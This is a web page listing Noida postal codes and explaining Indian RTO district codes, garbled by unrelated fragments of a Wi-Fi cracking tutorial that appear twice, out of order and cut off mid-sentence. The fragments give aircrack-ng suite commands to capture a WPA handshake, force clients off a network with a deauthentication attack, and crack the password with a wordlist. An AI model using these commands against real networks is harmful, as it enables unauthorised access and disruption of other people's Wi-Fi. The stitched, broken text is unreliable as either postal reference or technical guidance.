| Location | Pincode |
|---|---|
| Pin code of Vidyut Nagar (Gautam Buddha Nagar) | 201008 |
| Pin code of Noida, Sector 12, Sector 16, Sector 27 | 201301 |
| Pin code of Noida Sector 30, Sector 37, Sector 45 | 201303 |
| Pin code of Maharishi Nagar | 201304 |
| Pin code of Nepz Post Office | 201305 |
| Pin code of I.A. Surajpur | 201306 |
| Pin code of Noida Sector 55, Sector 34 | 201307 |
| Pin code of Noida Sector 62 | 201309 |
| Pin code of Alpha Greater Noida | 201310 |
| Pin code of Dadri | 203207 |
sudo airmon-ng Kill interfering processes:
Restore network services:
aircrack-ng -w wordlist.txt capture-01.cap
WPA handshake: <AP_MAC> The .cap file now contains the handshake. Press Ctrl+C to stop airodump-ng . To verify the handshake explicitly:
sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs. In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see:
sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01.cap . If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack):
Regional Transport Office (RTO), which is responsible for vehicle registration in India provides 2 digit unique code to each district followed by a number indicating the area or location within the district. For example, UP 16 is known as state Utter Pradesh and 16 is code for Noida
sudo airmon-ng Kill interfering processes:
Restore network services:
aircrack-ng -w wordlist.txt capture-01.cap
WPA handshake: <AP_MAC> The .cap file now contains the handshake. Press Ctrl+C to stop airodump-ng . To verify the handshake explicitly:
sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs. In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see:
sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01.cap . If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack):
Subscribe to Our newsletter to get updates on site and other useful information